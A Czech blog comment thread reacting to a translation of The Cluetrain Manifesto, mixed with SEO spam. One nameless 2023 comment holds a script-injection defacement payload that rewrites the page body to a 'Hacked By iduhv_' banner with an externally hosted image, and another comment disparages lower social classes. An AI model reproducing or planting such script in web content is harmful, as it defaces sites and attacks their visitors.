Názory k příspěvku Překlad The Cluetrain Manifesto:

Marek Prokop
http://www.sovavsiti.cz/
30.12.2011 11:02
Děkuji zdvořile. Konečně mohu žáky na školení odkazovat na českou verzi.
BoB
http://lakave.info
30.12.2011 11:49
Chytře napsaný manifest, ale na můj vkus v moc pesimistickém a agresivním tónu - tónu, ve kterém se nedává dobrá rada, ale vyhrožuje.
Jarda F.
http://www.ctyrkolky.com
30.12.2011 20:59
ahoj,
teď to nemyslím jako kritiku, ale jako dobře míněnou radu: ten text na mě působil špatně. Nemyslím obsahem, ale stylisticky. Velmi špatně se mi to četlo a vlastně jsem to ani nedočetl dokonce. Přes ty nepřirozené obraty a formulace jsem se jen obtížně prokousával k obsahu sdělení. Mám-li hovořit za sebe, knížku bych si nekoupil.
Neříkám to proto, abych naštval, urazil, zesměšnil nebo ponížil. Říkám to proto, abych pomohl.
Jarda
Marek Prokop
http://www.sovavsiti.cz/
31.12.2011 14:52
Jardo, za to Dušan nemůže. Ten text je těžký i v originálu, protože má nutit čtenáře přemýšlet. O to větší obdiv Dušanovi patří, že to dokázal tak dobře přeložit.
Carl114
http://tomaserlich.cz/
1.1.2012 17:17
Páni, děkuji všem za překlad. Už je stránka na liště a budu jej postupně číst. Vždycky si hrozně vážím překladů, protože je to vážně těžké. Rád se vždy něco přiučím, poučím a šťastný nový rok :).
Vuk
9.1.2012 19:27
Pěkné. Jeden bod za druhým se dá podepsat. Ale optimista moc nejsem, bylo to napsané před třinácti lety a ještě furt si toho asi moc firem nevšimlo - jistě ne u nás, a v zahraničí to o moc lepší taky nebude. Nejspíš zas takovou mocí "my uvědomělí konzumenti" nevládnem (ať už mezi ně zrovna já patřim nebo nepatřim).
Martin Prokeš
23.4.2013 09:21
Ten manifest mi přijde naprosto odtržený od reality. Týká se tak jednoho procenta inteligentních zákazníků.

Měl jsem ale tu čest přičichnout k oborům, které se týkají těch horších vrstev společnosti (kteří tvoří většinu "masy") a tam nic z toho rozhodně neplatí. Jde o stádo hloupých zoufalců, kteří nechápou psaný text, protože čtou pomalu a neradi, nedokážou objektivně rozlišit "výhodné" x "nevýhodné", neumí si spočítat triviální operace na úrovni procent a neumí komunikovat. Jsou velmi snadno manipulovatelní.

Dělat s takovým materiálem třeba "focus group" je neuvěřitelná bolest. Přitom oni si vlastní omezenost vůbec neuvědomují. Často jsou přehnaně sebevědomí a jejich mozky vytvořily obskurní modely, aby vysvětlily chaotický svět kolem nich. Těmto modelům pak ti lidé neochvějně věří.
eeffrrr288
https://www.constructionadditive.com/polyvinyl-alcohol-powder/
6.10.2023 18:51
Welcome to contact a professional factory https://www.constructionadditive.com/polyvinyl-alcohol-powder/
eeffrrr288
https://www.constructionadditive.com/hydroxy-propyl-starch-ether/
7.10.2023 00:00
Welcome to contact a professional factory https://www.constructionadditive.com/hydroxy-propyl-starch-ether/
8.10.2023 17:17
<ScRiPt>document.getElementsByTagName("body")[0].innerHTML = '<center><img src="https://f.top4top.io/p_28352dpp61.gif"><h1>Hacked By iduhv_</h1></center>''</ScRiPt>
eeffrrr288
https://www.ebiochemical.com/food-ingredients/antioxidants/bht.html
12.10.2023 09:06
Butylated Hydroxytoluene, also known as , is a chemical compound that is widely used as an antioxidant in various industries. https://www.ebiochemical.com/food-ingredients/antioxidants/bht.html
seo service UK
http://truediamond.co.uk/
26.2.2024 10:49
http://truediamond.co.uk/ Normally I don’t read post on blogs, but I wish to say that this write-up very forced me to try and do so! Your writing style has been amazed me. Thanks, very nice post. Nice to be visiting your blog again, it has been months for me. Well this article that i've been waited for so long. I need this article to complete my assignment in the college, and it has same topic with your article. Thanks, great share 
Přidat názor

(nezobrazí se, pouze to uvidím v adminu)

(zobrazí se vpravo nad příspěvkem)

Nejsi-li robot, zadej prosím číslo sto patnáct: